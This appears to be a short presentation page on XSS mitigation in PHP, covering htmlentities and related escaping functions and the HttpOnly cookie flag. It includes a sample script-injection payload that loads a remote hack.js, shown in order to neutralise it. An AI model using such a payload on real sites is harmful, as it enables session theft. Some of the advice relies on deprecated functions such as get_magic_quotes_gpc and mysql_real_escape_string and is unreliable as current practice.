Xss mitigation php [Repaired]
Download as PPTX, PDF0 likes407 views
This document discusses mitigating cross-site scripting (XSS) attacks in PHP. It describes XSS as when an attacker injects scripts into a web application's output that are then executed by a user's browser. The dangers of unmitigated XSS include stolen cookies, deployed trojans, and stolen user data. PHP provides functions like htmlentities(), htmlspecialchars(), get_magic_quotes_gpc(), stripslashes(), and mysql_real_escape_string() to sanitize input and prevent XSS. Examples are given showing how these functions can neutralize dangerous code by converting HTML tags to entities. The document also discusses setting the HttpOnly attribute in PHP to prevent client-side scripts from accessing protected
Xss mitigation php [Repaired]
- 1. Kerdainos neos gnosis Enjoy new knowledge XSS MITIGATION IN PHP KERDAINO NEOS GNOSIS
- 2. Kerdainos neos gnosis Enjoy new knowledge Tinashe Makuti Developer @Base2Theory C,C++, PHP, VISUAL BASIC.NET WEBSITE: www.educattem.com Email. mtinashe@educattem.com
- 3. Contents • WHAT IS XSS. • DANGERS OF NOT MITIGATING IT. • PHP’S HELP IN STOPPING DEADLY XSS (htmlentities) • htmlspecialchars(), get_magic_quotes_gpc(), stripslashes(), mysql_real_escape_string() • Setting Httponly attribute in PHP so to avoid client access to protected cookies
- 4. What is xss Defined earlier on. • But never the less Cross Site Scripting(xss) is the event when an attacker injects a script, often JavaScript, into the output of a web application in such a way that it is executed in the client browser.
- 5. DANGERS OF NOT TAKING ACTION AGAINST IT. Cookies will be stolen. • Stolen cookies helps the attacker to know your client’s username and password. • The attacker can deploy a Trojan on your user’s computer. • The attacker like you can steal money from the bank, like you are going to do today.
- 6. So what does uncle PHP say about this naughty boy XSS PHP offers us with a wide range of purifier functions namely: i. Htmlentities ii. htmlspecialchars(), iii.get_magic_quotes_gpc(), iv.stripslashes(), v. mysql_real_escape_string() Use of these is seen in the next slide as they are used together to sanitize some vulnerable code.
- 7. Some dangerous code <script src='http://x.com/hack.js'> </script><script>hack();</script> Our purpose is to neutralize this code. • If let to run this code will load in a JavaScript program and then executes malicious functions. • But this is not much of a threat if we apply the htmlentities sanitizer.
- 8. Some dangerous code htmlentities(<script src='http://x.com/hack.js'></script>) htmlentities(<script>hack();</script>) Neutralized. • If let to run this code it will turn into a harmless string below <script src='http://x.com/hack.js'> </script><script>hack();</scrip t> • Good thing about this is that this is harmless to our client’s machine.
- 9. Another example: Uncle PHP at work <?php function mysql_entities_fix_string($string) { return htmlentities(mysql_fix_string($string)); } function mysql_fix_string($string) { If (get_magic_quotes_gpc()) $string = stripslashes($string); return mysql_real_escape_string($string); } ?> The mysql_entities_fix_string function first calls mysql_fix_string and then passes the result through htmlentities before returning the fully sanitized string.
- 10. Finally restricting access to our cookies using HttpOnly HttpOnly allows mitigating the risk of a client side script accessing our protected cookies. • But however this will only work if the selected browser is compatible with the httponly attribute.
- 11. Using PHP to set HttpOnly PHP supports setting of the HttpOnly flag from version 5.0.2 Thus session cookies managed by PHP, the flag can be set permanently in the php.ini file i.e session.cookie_httponly = True